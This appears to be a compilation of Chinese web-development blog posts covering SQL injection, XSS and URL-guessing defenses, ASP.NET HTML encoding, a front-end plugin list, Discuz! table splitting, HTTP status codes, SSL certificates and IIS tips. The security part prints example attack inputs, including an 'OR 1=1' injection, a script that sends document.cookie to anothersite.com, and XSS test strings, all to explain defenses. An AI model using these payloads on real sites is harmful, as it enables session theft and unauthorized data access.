互联网项目里边，SQL 注入漏洞、XSS 漏洞和猜测 URL 攻击这三个漏洞可谓历史悠久，然而直到今天还有人不断中枪，也真是微醺。

这几个漏洞说大也大，说小也小。说大是说这些漏洞危害大，会导致数据层面的安全问题；说小是从技术层面上讲都是未对外部输入做处理导致的，想要做针对性地防范很简单。下面简单看看这些漏洞的原因及防范方法。

SQL 注入

SQL 注入之所以存在，主要是因为工程师将外部的输入直接嵌入到将要执行的 SQL 语句中了。黑客可以利用这一点执行 SQL 指令来达到自己目的。举例来说，有一个接受参数为 id 的页面，在接收到id后从数据库中查询相应的数据， 其代码大致如下：

string  SQL = "SELECT * FROM [User] WHERE ID=" + Request["ID"];

正常情况下，Request["ID"] 为数字，这条 SQL 能很好地工作。如果我们认为修改 Request["ID"]，将其内容修改为 ID=1 OR 1=1 我们将得到这样一条 SQL：

SELECT * FROM [User] WHERE ID=1 OR 1=1

因为有 OR 的出现这条 SQL 语句已经可以获取 User 表中的任意信息。利用 SQL 注入漏洞，我们能够获取想要的信息，同时可以通过猜测-报错获取到数据库其它表的结构和信息，如果数据库、服务器权限设置不当，甚至有可能能获取到整个服务器的控制权限。

规避这种漏洞有很多种办法，以现代的编程语言来说，选择一个合适的 ORM 框架可以减少不少问题而且能大大提高开发效率。

如果因为某些原因需要继续写 SQL 语句，参数化查询也能解决这一问题。

对于需要拼接 SQL 语句的程序来说，注意两点也可以避免此问题。第一点是如果查询的字段类型是数字等类型，在拼接 SQL 前先判断输入是不是一个合法的数字，不合法则终止程序即可。第二点是如果字段类型是字符串，则记得将输入里的单引号进行转义。

XSS 攻击

如果说 SQL 注入是直接在 SQL 里执行了用户输入，那 XSS 攻击是在 HTML 里代码执行了用户输入。相对 SQL 注入，XSS 似乎更能引起人关注。几年前新浪微博被人利用 XSS 获取大量粉丝；3DM 也曾经被植入 script 代码对另一个游戏网站进行了惨无人道的 DDOS 攻击。

这里还是用 SQL 注入中的例子来说，假设页面输出为：

<div><%= Request["ID"] %></div>

这里我们可以在 Request["ID"] 里传入一段编码后的脚本，在最终输出的时候，就变成了一段可执行的 javascript 代码。

<script>window.location.href='anothersite.com?cookie=' + document.cookie;</script>

这段代码获取到当前页面的 cookie 值，并将 cookie 值传递到另一个名为 anothersite.com 的网站。利用这种模式，黑客可以获取到用户的登录信息或者将用户跳转到钓鱼网站来达成自己的目的。

XSS 攻击也可以简单分为两种，一种是上述例子中利用 url 引诱客户点击来实现；另一种是通过存储到数据库，在其它用户获取相关信息时来执行脚本。

防范 XSS 攻击需要在所有的字段都对输入的字符串进行 html encode（或者在输出时进行 encode）。如果需要使用富文本编辑的，可以考虑使用 UBB。

猜测 URL 攻击

猜测 URL 攻击是通过已知的 GET、POST 参数来猜测未公开的参数并尝试进行攻击。

以 Request["ID"] 为例，如果 ID 为 1 是合法的可访问的数据，可以通过尝试 ID=2，ID=3 等一系列来尝试是否对其它资源有访问、修改权限。如果控制不当，则可以轻松获得并修改数据。

要避免这种问题，方案一是使用较长的无规律的数字、字符来做为 ID，增大猜测难度；对于需要登录的程序，可以判断用户身份是否有对应 ID 数据的访问、修改权限；如果 ID 已经是自增类型且不需要登录，可以用过在 URL 里增加无规律的校验字段来避免。

其它需要注意的地方

安全是一个系统工程。

要提高系统安全性，最首要的一点是不要相信任何输入！不要相信任何输入！不要相信任何输入！重要的事情说三遍。这里的输入除了 URL 里的 GET 参数、POST 参数，还包括 COOKIE、Header 等可以进行修改的各类信息。

在程序设置方面，不输出客户不需要知道的各类信息，如原始的异常信息、异常附近的代码段等等，这样也能增加不少安全性。

最后，在测试或系统运行的过程中，可以使用类似 appscan 这样的安全检测工具来检查程序是否有漏洞。

XSS （跨站脚本攻击）虽然手段初级，但网站开发者稍不留神就会给黑客留下机会。在 ASP.NET 中，默认阻止了表单文本中的危险字符（譬如 HTML 标签），但有时为了功能需求，我们需要在服务端获取用户输入的任何文本或者富文本编辑器的内容，那么首先应该使用 JS 将数据进行 HTML 编码。

将以下测试文本填入到多行文本框内：

&a=1
'">ABC<'"
</pre>PRE<pre>
</textarea>AREA<textarea>
<script>alert(1)</script>

或将以下测试文本填入到单行文本框内：

&a=1'">a< /input>b<input value='"c<script>alert(1)</script>

使用 jQuery 异步 POST 方式提交到服务端：

$.post("post.aspx", {
  myData: $("#myTextarea").val()
}, function (data) {
  console.log(data);
}, 'text');

这时，post.aspx 将返回 500 内部服务器错误：

从客户端(......)中检测到有潜在危险的 Request.Form 值。

将提交代码稍作改动，把 POST 数据进行 HTML 编码：

$.post("post.aspx", {
  myData: $('<div />').text($("#myTextarea").val()).html()
}, function (data) {
  console.log(data);
}, 'text');

这样，服务端接收到的 myData 值应该是：

&a=1
'">ABC<'"
</pre>PRE<pre>
</textarea>AREA<textarea>
<script>alert(1)</script>

顺利通过 ValidateRequest 的检验。

我们在服务端对其进行一次 HTML 解码。

string myData = HttpUtility.HtmlDecode(Request.Form["myData"]);
// 接收时，去首尾空格、去 null
string myData = HttpUtility.HtmlDecode(Request.Form["myData"]?.Trim() ?? "");

客户端的编码和服务端的解码是一对互操作。

我们把用户输入的原始内容存入数据库中。

页面输出时，必须要经过 HTML 编码，否则内容将被解释成 HTML，出现跨站攻击漏洞。下面列出常见的输出到页面的方法（注意区分 <%= 与 <%:，<%# 与 <%#:）。这样，浏览器中查看源代码看到的即是 HTML 编码的内容，渲染后看到的即是原本在输入框中输入的原文。

// WebForm 输出到 div
<div><%: myData %></div>

// WebForm 输出到 pre
<pre><%: myData %></pre>

// WebForm 输出到文本脚本
<script type="text/plain"><%: myData %></script>

// WebForm 输出到单行文本框
<input type="text" value='<%: myData %>' />

// WebForm 输出到多行文本框
<textarea><%: myData %></textarea>

// WebForm 赋值到 <asp:TextBox /> （不需要手动 HtmlEncode）
input_myData.Text = myData;

// WebForm 绑定到数据控件
<%#: Eval("myData") %>

// MVC Razor
@Html.DisplayFor(model => model.myData)
// 或
@Model.myData

<%: 会自动替换 " 和 ' 为 " 和 '，不用担心输出到 <input /> 的 value 属性中会产生问题。

如果数据由 <textarea /> 提供并希望在输出时保持换行，那么先执行 HtmlEncode，再替换换行符：

// WebForm 输出到 div
<div><%= HttpUtility.HtmlEncode(myData)?.Replace(" ", "&nbsp;").Replace("\r\n", "<br />").Replace("\r", "<br />").Replace("\n", "<br />") %></div>

// WebForm 输出到 pre（无须处理换行）
<pre><%: myData %></pre>

// WebForm 绑定到数据控件
<%# HttpUtility.HtmlEncode(Eval("myData"))?.Replace(" ", "&nbsp;").Replace("\r\n", "<br />").Replace("\r", "<br />").Replace("\n", "<br />") %>

更特殊的例子：

// WebForm 输出到 Highcharts
var chart = Highcharts.chart('container', {
  title: {
    text: $('<div />').html('《<%: exam.title.Replace("\r", "").Replace("\n", "") %>》问卷回收量').html()
  },
  ...
});

// 导出 Excel 时指定文件名（会自动替换非法字符）
Response.AddHeader("Content-Disposition", string.Format("attachment; filename={0}.xls", exam.title));

如果我们使用在线编辑器来编辑我们的内容，需要在浏览输出时实现“所见即所得”，那么就需要将原文输出到源代码，渲染后展示效果：

// ASPX
<%= myData %>

// Razor
@Html.Raw(Model.myData)

务必保证是网站编辑人员在授权登录下提交在线编辑器的内容，否则可能成为跨站攻击的漏洞。通常不建议普通网友使用在线编辑器，如一定要用，必须处理一些危险的标签，参此文。

总结

客户端输入的原文，经过 JS 的 HTML 编码传输到服务器，HTML 解码后存入数据库，读取展示时 HTML 编码输出（在线编辑器的内容不需要编码）。

建议

如果我们对所有输入的字符串作以上编码解码的处理想必是非常繁琐且容易出错的。微软提供了 ValidateRequest，不用不是太浪费了？

对于普通的文本框输入，我们省略 JS 端的 HTML 编码，省略服务端的 HTML 解码即可，输出仍然按文中描述处理。

好的用户体验是在 Request.Form["xxx"] 时进行容错处理并返回客户端友好提示。

我们仅针对在线编码器及需要以代码为内容的数据提交进行编码、解码处理，以绕过 ValidateRequest。

顺便提一下，千万不要这样写：

<%= Request.QueryString["xxx"] %>

千万不要动态拼接 SQL 语句，防止 SQL 注入。

收录了一些个人觉得不错的网页开发插件。

由于插件更新频繁，本页如有错误请指正，也欢迎告知更多功能强大、使用方便的插件。

插件	简介	备注
框架
jQuery	最流行的 JS 框架	下载、中文文档、英文整合文档、中文整合文档，浏览器支持、来自 css88 的文档 官方建议 IE 6-8 使用 1.12.4
Angular、中文版 AngularJS (version 1.x)	一套框架，多种平台同时适用手机与桌面	MVC 架构，使得开发现代的单一页面应用程序（SPAs：Single Page Applications）变得更加容易
Vue.js	是一套用于构建用户界面的渐进式框架。
Bootstrap、中文版	简洁、直观、强悍的前端开发框架	英文文档、v3中文文档、v2中文文档、视频教程，主题和模板
jQuery UI	为 jQuery 提供更丰富的功能	示例：Datepicker、Color Animation、Shake Effect
功能
jQuery File Upload	jQuery 文件上传	英文文档
jQuery Cookie	读取、写入和删除 cookie	浏览器支持，文档
json2.js	json 操作库	已弃用，旧 IE 用 jQuery 的 parseJSON，HTML 5 用 JSON.parse
Lightbox	老牌图片浏览插件 推荐使用更强大的 Viewer.js
Swiper、中文版	最现代的移动触摸滑块（Most Modern Mobile Touch Slider）	英文文档，中文文档，旧浏览器支持版本：2.x.x，Swiper 2 英文文档，中文文档
jquery-cropper	图片裁剪
FastClick	用于消除手机浏览器上触摸事件触发之间的 300 毫秒延迟	用法，不应用的场景
PACE	页面加载进度条	文档，IE8+
toastr	jQuery 通知	文档
Autosize	一款小巧的，可自动调整 textarea 高度的独立脚本	IE9+
X-editable	允许您在页面上创建可编辑元素	文档，Demo
select2	一款提供搜索过滤、自定义样式的下拉框插件
jQuery Tags Input	标签输入框	用法
Viewer.js	图片浏览插件	GitHub（viewerjs）、GitHub（jquery-viewer） jquery-viewer 是 viewerjs 的 jQuery 插件，即在 jQuery 环境中要同时引用这两个脚本。
PDF.js	A general-purpose, web standards-based platform for parsing and rendering PDFs.
编辑器
UEditor	百度在线编辑器	GitHub 下载、文档、ASP.NET 部署教程
日期时间
bootstrap-datepicker	Bootstrap 日期选择器	Online Demo
DateTimePicker	日期时间选择
MultiDatesPicker	多日期选择
FullCalendar	日历日程事件工作表	IE 9+, jQuery 2.0.0+
TimeTo	计时、倒计时
图表
D3.js	D3.js 是基于数据驱动文档工作方式的一款 JavaScript 函数库，主要用于网页作图、生成互动图形，是最流行的可视化库之一。
Highcharts、中文版	兼容 IE6+、完美支持移动端、图表类型丰富、方便快捷的 HTML5 交互性图表库	文档
ECharts	百度图表控件
AntV	来自蚂蚁金服的专业、简单、无限可能的可视化解决方案 G2 - 专业易用的可视化类库 G2-mobile - 移动端高性能可视化类库 G6 - 关系图可视化类库	流程图, 关系图, 可视化规范, 地图, 河流图, 力导图, 网络图, UML图, 业务流程图, 时序图
SyntaxHighlighter	功能齐全的代码语法高亮插件（JS）
动态排名数据可视化	将历史数据排名转化为动态柱状图图表 开源代码，非插件，修改使用	GitHub、视频教程、EV录屏、网页示例、视频效果
图标
Font Awesome	完美的图标字体	IE 8+，v3.2.1 支持 IE 7，进阶用法（定宽/边框/动画/旋转/叠加）
Glyphicons	图标字体	作为 Bootstrap 组件
Iconfont	阿里巴巴矢量图标库	用户可以自定义下载多种格式的 icon，也可将图标转换为字体，便于前端工程师自由调整与调用
UI 框架
WeUI	同微信原生视觉体验一致的基础样式库	Demo、Wiki
Apple UI Design Resources	苹果用户界面设计资源

若在谷歌浏览器中记住密码，再次打开时，表单中自动填充的文本框和下拉框都变成了黄色背景，影响界面美观，可以使用以下样式修正：

/* Change Autocomplete styles in Chrome*/
input:-webkit-autofill,
input:-webkit-autofill:hover, 
input:-webkit-autofill:focus
input:-webkit-autofill, 
textarea:-webkit-autofill,
textarea:-webkit-autofill:hover
textarea:-webkit-autofill:focus,
select:-webkit-autofill,
select:-webkit-autofill:hover,
select:-webkit-autofill:focus {
  border: 1px solid green;
  -webkit-text-fill-color: green;
  -webkit-box-shadow: 0 0 0px 1000px #000 inset;
  transition: background-color 5000s ease-in-out 0s;
}

具体样式请自行修改。

参考资料：https://css-tricks.com/snippets/css/change-autocomplete-styles-webkit-browsers/

对于大型站点，庞大的主题和帖子数据，分表放到一个主题表和一个帖子表中，已经成为影响性能的一个因素。因此，急需进行分表操作来避免 MySQL 对于大数据表的频繁操作。
1、后台分表
       Disucz! X2 后台重新调整了分表的机制，使得分表效率和后期站点性能得到提升。具体分表设置在 后台 -> 站长 -> 主题分表（帖子分表）。
      1）主题分表
           主题分表分为两种类型，一种为主表，一种为存档表。主表只有一个，存档表可以有多个。我们进行分表操作，首先进行创建存档表的操作，然后进行主题移动，将指定条件的主题移动到存档表中。
           a、创建存档表
                打开 source/admincp/admincp_threadsplit.php 文件，找到创建存档表的条件分支

1. elseif($operation == 'addnewtable')

复制代码

              首先获取当前最大的主题表 id ，然后根据 forum_thread 的建表语句，生成新的存档表（id + 1），最后更新缓存。
          b、主题移动
               存档表建好后，下一步就是将主题移动到这个存档表中。在选择主题的时候，可以根据提供的搜索条件，特别是“更多选项”中的搜索条件，来转移符合条件的主题。这里主要是一个搜索的过程，转移数据的过程使用 REPLACE INTO … SELECT...FROM... 语句，比较简单。
      2）帖子分表
           帖子分表也是要分成两步，第一步先创建帖子分表，第二步转移数据。
           打开 source/admincp/admincp_postsplit.php 文件，找到帖子分表的条件分支

1. elseif($operation == 'split')

复制代码

         如果是对主表进行分表操作，主表必须要大于400M，见下面的条件判断  

1. if($status && ((!$tableid && $status['Data_length'] > 400 * 1048576) || ($tableid && $status['Data_length'])))

复制代码

        在站长提交分表表单后，程序会先根据 getmaxposttableid 函数获取当前帖子表最大的 id ，然后根据已有的帖子表结构，创建新分表，并更新缓存等信息。创建成功后，开始转移数据的操作。找到条件分支

1. elseif($operation == 'movepost')

复制代码

，开始转移数据的操作。当从主表中转移数据时，是根据主题表中最后回复时间正序排列的主题 tid 来获取帖子数据的。  

1. $query = DB::query("SELECT tid FROM ".DB::table($table)." WHERE posttableid='0' AND displayorder>='0' ORDER BY lastpost LIMIT 0, 1000");

复制代码

然后，利用 movedate 函数进行转移数据。
  当从从表中转移数据时，是根据给定帖子表的 id，获取此表中first=1的帖子所属 tid，  

1. $query = DB::query("SELECT tid FROM ".DB::table(getposttable($fromtableid))." WHERE `first`='1' LIMIT 0, 1000")

复制代码

然后利用 movedate 函数进行转移数据。
  在 movedate 函数中，根据获取到的 tid ，将属于此 tid 的帖子，利用 INSERT INTO … SELECT … FROM ...来转移数据。在此过程中，更新主题表中 posttableid 这个字段，来标识帖子的存储表。
2、主题列表页分表读取
      在主题列表页，只能看到主题主表中的主题。存档表中的主题都在存档区。
      在这部分的代码（source/module/forum/forum_forumdisplay.php）中，所有涉及到的主题表都以 $threadtable 这个变量代替，$threadtable 这个变量的获取，又是根据用户是否查看存档区的标识 archiveid 来判定。
 

1. $threadtable = $_G['gp_archiveid'] && in_array($_G['gp_archiveid'], $threadtableids) ? "forum_thread_{$_G['gp_archiveid']}" : 'forum_thread';

复制代码

当用户选择非存档内容时，archiveid = 0 或者不存在，这时，直接从 forum_thread 主表来读取主题列表。当用户选择存档内容时，archiveid = 1（1 表示存档表的 id，如果查看 id 为 2 的存档表，archiveid = 2），程序会根据 archiveid  来判断从哪个存档表中去获取主题列表。
3、帖子内容页分表读取
     当用户浏览帖子内容页时，程序首先利用 loadforum 函数来获取当前的主题信息。在 loadforum 函数中，

1. $_G['thread'] = get_thread_by_tid($tid, '*', $addcondiction, $archiveid);

复制代码

根据提供的 tid，get_thread_by_tid 函数到主表和存档表中分表去查找，直到找到对应的主题信息。
在 source/module/forum/forum_viewthread.php 文件中，根据

1. $thread = & $_G['forum_thread'];

复制代码

1. $threadtable = $thread['threadtable'];
2. $posttableid = $thread['posttableid'];
3. $posttable = $thread['posttable'];

复制代码

这两句来判定该主题应该去哪个帖子表中去获取帖子内容列表。
4、发新主题
      发表新主题时，直接往主题主表中插入数据，对应的 posttableid = 0。然后，当插入帖子数据时，通过 insertpost 函数将数据插入帖子表中。
     在 insertpost 函数中，会先去判断所属主题的 posttableid 值，得到目标帖子表，然后再往该帖子表中插入帖子数据。
5、发新回复
     只有在主表的主题才能回复，因此，直接根据传递的tid去获取目标帖子表，然后插入数据。这个跟发新主题时，插入帖子内容过程相同。
6、编辑帖子
     同样，只有在主表中的主题的帖子才能被编辑，因此，主题都在 forum_thread 表中。需要获取的是该主题的帖子在哪个帖子表中。打开 source/include/post/post_editpost.php 文件，找到

1. $posttable = getposttablebytid($_G['tid']);

复制代码

程序在开始，通过这条语句来获取目标帖子表。在 getposttablebytid 函数中，程序根据 tid ，逐个主题表进行查找，找到对应的主题信息，获取目标帖子表，然后指向后续的编辑帖子操作。
8、取消存档
     存在存档区的主题，如果想取消存档，可以通过页面底部的“取消存档”来执行。
     打开 source/include/topicadmin/topicadmin_restore.php 文件，可以看到取消存档，实际上仅是将放在存档表中的主题移动到了主表中。同样，存档表的获取还是通过 archiveid 这个参数来决定的。

1. $threadtable = $archiveid ? "forum_thread_$archiveid" : 'forum_thread';

复制代码

从这可以看出，存档的概念仅限于主题，帖子无所谓存档的概念。

　　windows 7和vista提高的系统的安全性，同时需要明确指定“以管理员身份运行”才可赋予被运行软件比较高级的权限，比如访问注册表等。否则，当以普通身份运行的程序需要访问较高级的系统资源时，将会抛出异常。

　　如何让程序在启动时，自动要求“管理员”权限了，我们只需要修改app.manifest文件中的配置项即可。

　　app.manifest文件默认是不存在的，我们可以通过以下操作来自动添加该文件。

（1）进入项目属性页。

（2）选择“安全性”栏目。

（3）将“启用ClickOnce安全设置”勾选上。

　　现在，在Properties目录下就自动生成了app.manifest文件，打开该文件，将trustInfo/security/requestedPrivileges节点的requestedExecutionLevel的level的值修改为requireAdministrator即可。如下所示：

      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
         <requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
      </requestedPrivileges>

 

　　记住，如果不需要ClickOnce，可以回到项目属性页将“启用ClickOnce安全设置”不勾选。 　　

　　接下来，重新编译你的程序就OK了。

成员名称	说明
Accepted	等效于 HTTP 状态 202。 Accepted 指示请求已被接受做进一步处理。
Ambiguous	等效于 HTTP 状态 300。 Ambiguous 指示请求的信息有多种表示形式。默认操作是将此状态视为重定向，并遵循与此响应关联的 Location 标头的内容。
BadGateway	等效于 HTTP 状态 502。 BadGateway 指示中间代理服务器从另一代理或原始服务器接收到错误响应。
BadRequest	等效于 HTTP 状态 400。 BadRequest 指示服务器未能识别请求。如果没有其他适用的错误，或者不知道准确的错误或错误没有自己的错误代码，则发送 BadRequest。
Conflict	等效于 HTTP 状态 409。 Conflict 指示由于服务器上的冲突而未能执行请求。
Continue	等效于 HTTP 状态 100。 Continue 指示客户端可能继续其请求。
Created	等效于 HTTP 状态 201。 Created 指示请求导致在响应被发送前创建新资源。
ExpectationFailed	等效于 HTTP 状态 417。 ExpectationFailed 指示服务器未能符合 Expect 头中给定的预期值。
Forbidden	等效于 HTTP 状态 403。 Forbidden 指示服务器拒绝满足请求。
Found	等效于 HTTP 状态 302。 Found 指示请求的信息位于 Location 头中指定的 URI 处。接收到此状态时的默认操作为遵循与响应关联的 Location 头。原始请求方法为 POST 时，重定向的请求将使用 GET 方法。
GatewayTimeout	等效于 HTTP 状态 504。 GatewayTimeout 指示中间代理服务器在等待来自另一个代理或原始服务器的响应时已超时。
Gone	等效于 HTTP 状态 410。 Gone 指示请求的资源不再可用。
HttpVersionNotSupported	等效于 HTTP 状态 505。 HttpVersionNotSupported 指示服务器不支持请求的 HTTP 版本。
InternalServerError	等效于 HTTP 状态 500。 InternalServerError 指示服务器上发生了一般错误。
LengthRequired	等效于 HTTP 状态 411。 LengthRequired 指示缺少必需的 Content-length 头。
MethodNotAllowed	等效于 HTTP 状态 405。 MethodNotAllowed 指示请求的资源上不允许请求方法（POST 或 GET）。
Moved	等效于 HTTP 状态 301。 Moved 指示请求的信息已移到 Location 头中指定的 URI 处。接收到此状态时的默认操作为遵循与响应关联的 Location 头。原始请求方法为 POST 时，重定向的请求将使用 GET 方法。
MovedPermanently	等效于 HTTP 状态 301。 MovedPermanently 指示请求的信息已移到 Location 头中指定的 URI 处。接收到此状态时的默认操作为遵循与响应关联的 Location 头。
MultipleChoices	等效于 HTTP 状态 300。 MultipleChoices 指示请求的信息有多种表示形式。默认操作是将此状态视为重定向，并遵循与此响应关联的 Location 标头的内容。
NoContent	等效于 HTTP 状态 204。 NoContent 指示已成功处理请求并且响应已被设定为无内容。
NonAuthoritativeInformation	等效于 HTTP 状态 203。 NonAuthoritativeInformation 指示返回的元信息来自缓存副本而不是原始服务器，因此可能不正确。
NotAcceptable	等效于 HTTP 状态 406。 NotAcceptable 指示客户端已用 Accept 头指示将不接受资源的任何可用表示形式。
NotFound	等效于 HTTP 状态 404。 NotFound 指示请求的资源不在服务器上。
NotImplemented	等效于 HTTP 状态 501。 NotImplemented 指示服务器不支持请求的函数。
NotModified	等效于 HTTP 状态 304。 NotModified 指示客户端的缓存副本是最新的。未传输此资源的内容。
OK	等效于 HTTP 状态 200。 OK 指示请求成功，且请求的信息包含在响应中。这是最常接收的状态代码。
PartialContent	等效于 HTTP 状态 206。 PartialContent 指示响应是包括字节范围的 GET 请求所请求的部分响应。
PaymentRequired	等效于 HTTP 状态 402。保留 PaymentRequired 以供将来使用。
PreconditionFailed	等效于 HTTP 状态 412。 PreconditionFailed 指示为此请求设置的条件失败，且无法执行此请求。条件是用条件请求标头（如 If-Match、If-None-Match 或 If-Unmodified-Since）设置的。
ProxyAuthenticationRequired	等效于 HTTP 状态 407。 ProxyAuthenticationRequired 指示请求的代理要求身份验证。Proxy-authenticate 头包含如何执行身份验证的详细信息。
Redirect	等效于 HTTP 状态 302。 Redirect 指示请求的信息位于 Location 头中指定的 URI 处。接收到此状态时的默认操作为遵循与响应关联的 Location 头。原始请求方法为 POST 时，重定向的请求将使用 GET 方法。
RedirectKeepVerb	等效于 HTTP 状态 307。 RedirectKeepVerb 指示请求信息位于 Location 头中指定的 URI 处。接收到此状态时的默认操作为遵循与响应关联的 Location 头。原始请求方法为 POST 时，重定向的请求还将使用 POST 方法。
RedirectMethod	等效于 HTTP 状态 303。作为 POST 的结果，RedirectMethod 将客户端自动重定向到 Location 头中指定的 URI。用 GET 生成对 Location 标头所指定的资源的请求。
RequestedRangeNotSatisfiable	等效于 HTTP 状态 416。 RequestedRangeNotSatisfiable 指示无法返回从资源请求的数据范围，因为范围的开头在资源的开头之前，或因为范围的结尾在资源的结尾之后。
RequestEntityTooLarge	等效于 HTTP 状态 413。 RequestEntityTooLarge 指示请求太大，服务器无法处理。
RequestTimeout	等效于 HTTP 状态 408。 RequestTimeout 指示客户端没有在服务器期望请求的时间内发送请求。
RequestUriTooLong	等效于 HTTP 状态 414。 RequestUriTooLong 指示 URI 太长。
ResetContent	等效于 HTTP 状态 205。 ResetContent 指示客户端应重置（或重新加载）当前资源。
SeeOther	等效于 HTTP 状态 303。作为 POST 的结果，SeeOther 将客户端自动重定向到 Location 头中指定的 URI。用 GET 生成对 Location 标头所指定的资源的请求。
ServiceUnavailable	等效于 HTTP 状态 503。 ServiceUnavailable 指示服务器暂时不可用，通常是由于过多加载或维护。
SwitchingProtocols	等效于 HTTP 状态 101。 SwitchingProtocols 指示正在更改协议版本或协议。
TemporaryRedirect	等效于 HTTP 状态 307。 TemporaryRedirect 指示请求信息位于 Location 头中指定的 URI 处。接收到此状态时的默认操作为遵循与响应关联的 Location 头。原始请求方法为 POST 时，重定向的请求还将使用 POST 方法。
Unauthorized	等效于 HTTP 状态 401。 Unauthorized 指示请求的资源要求身份验证。WWW-Authenticate 头包含如何执行身份验证的详细信息。
UnsupportedMediaType	等效于 HTTP 状态 415。 UnsupportedMediaType 指示请求是不支持的类型。
Unused	等效于 HTTP 状态 306。 Unused 是未完全指定的 HTTP/1.1 规范的建议扩展。
UpgradeRequired	等效于 HTTP 状态 426。 UpgradeRequired 指示客户端应切换为诸如 TLS/1.0 之类的其他协议。
UseProxy	等效于 HTTP 状态 305。 UseProxy 指示请求应使用位于 Location 头中指定的 URI 的代理服务器。

苹果宣布 2017 年 1 月 1 日开始所有上架的应用必须启用 ATS 安全传输功能。ATS 要求服务器必须支持传输层安全(TLS)协议 1.2 以上版本；证书必须使用 SHA256 或更高的哈希算法签名；必须使用 2048 位以上 RSA 密钥或 256 位以上 ECC 算法等等，不满足条件的证书，ATS 都会拒绝连接。查看具体要求

微信小程序进入开发公测阶段，同样要求提供 HTTPS 方式安全连接。

证书类型对比

		DV SSL 域名验证型	OV SSL 组织验证型	EV SSL 扩展验证型
申请条件	申请对象	个人 / 企业	企业	企业
	证明域名所有权	√	√	√
	价格	免费 / 低	中	高
提交审核	提交资料	邮箱、姓名、手机等	DV 所需资料以及： 组织机构资料（企业执照）等	OV 所需资料以及： 法律相关文件
	审核时间	自动审核 1小时内	人工审核 3~5工作日	人工审核 3~5工作日
可信标识	地址栏挂锁	√	√	√
	地址栏公司名称	×	×	√
	绿色地址栏（IE）	×	×	√
保护范围	单域名	√	√	√
	多域名	√	√	√
	通配符/泛域名	√	√	×
推荐用途		个人及小型网站	一般组织或中小型企业	金融、电商、大型企业或受信组织

* 表格中，单域名指单个子域名（如：123.abc.com），多域名指多个子域名（可以不属于同一个顶级域名，如：123.abc.com / 456.abc.com / 456.def.com），通配符指单个顶级域名的所有子域名（如：*.abc.com）。
* 若 https 的网页中包含 http 资源，则地址栏的锁可能会消失。
* 浏览器上点击地址栏的锁可以查看具体的证书详情。

证书颁发机构（CA）

机构	简介	谁在用
Let's Encrypt	公益组织，免费，每 90 天续约	越来越多的中小网站
Symantec	赛门铁克	百度、支付宝、阿里云、Apple（EV）、微软
GlobalSign	公众信任服务行业的领头羊	淘宝、天猫（OV）、阿里云、京东（OV）
GeoTrust	全球第二大？	微信
Comodo	价格实惠
GoDaddy	全球互联网域名注册商
DigiCert	不颁发 DV，在非 DV 市场份额中是老大	Facebook、Twitter（EV）、Mozilla（EV）、GitHub（EV）等
沃通 WoSign	国产	360搜索（EV）
Other

* 赛门铁克收购了 VeriSign，VeriSign 又收购了 GeoTrust，所以 Symantec 和 GeoTrust 在 SSL 认证服务上就不知道是什么关系了，请自行百度。

* 代理商也可以购买，或许价格优惠，或许申请方便，如：阿里云、腾讯云等，甚至上淘宝购买。

* 查看：Netcraft 统计的市场份额

* 网上说使用 Let's Encrypt 的 SSL 在遇到国内第三方 DNS 解析服务时会超时，我认为只是在申请证书时偶尔超时（DNS query timed out），重试即可，证书部署后访问网站时应该没有问题，请知情者告知实情。

* 各版本 Windows 对 SSL/TLS 协议的支持

下一步

购买和部署阿里云的免费型 DV SSL 证书服务

在 IIS 中部署 SSL

在 nginx 中部署 SSL

IIS 中如果直接“停止”网站，那么打开页面时会显示不友好的“该页无法显示”等界面，如果特殊原因要求不能打开所有页面，但必须有一个友好提示“网站维护中”的页面，那么最土的办法是把网站的所有文件移出来，仅上传一个提示正在维护的网页，并保证是默认首页。其实有一个更加简单有效的解决方案：

在 IIS 中单击该网站，打开“URL 重写”，右侧“添加规则”，选择“空白规则”。名称可以是“网站维护中”，请求的 URL 选择“与模式不匹配”，使用“完全匹配”，模式填入我们的提示页面地址，如“maintaining.html”，操作类型“重定向”，重定向 URL 填入刚才那个页面地址，附加查询字符串不需要，类型选择“临时(307)”，点击右侧“应用”。

好了，该网站的任何请求都会引导到 maintaining.html，而不仅仅是首页的跳转。而且不需要移动网站文件，也保障了不会被人利用网站漏洞攻击篡改网站内容。

补充一点，如果你的 maintaining.html 中调用了网站中的图片、脚本、样式表等，那么需要把模式匹配的方式改为“正则表达式”，并填入正确的正则表达式，以保证这些文件都能被正常请求。

一般地，我们容易想到：

DELETE FROM [表名]

但是，有一个更快更高效的命令：

TRUNCATE TABLE [表名]

如果需要按条件删除那就只能用 DELETE 了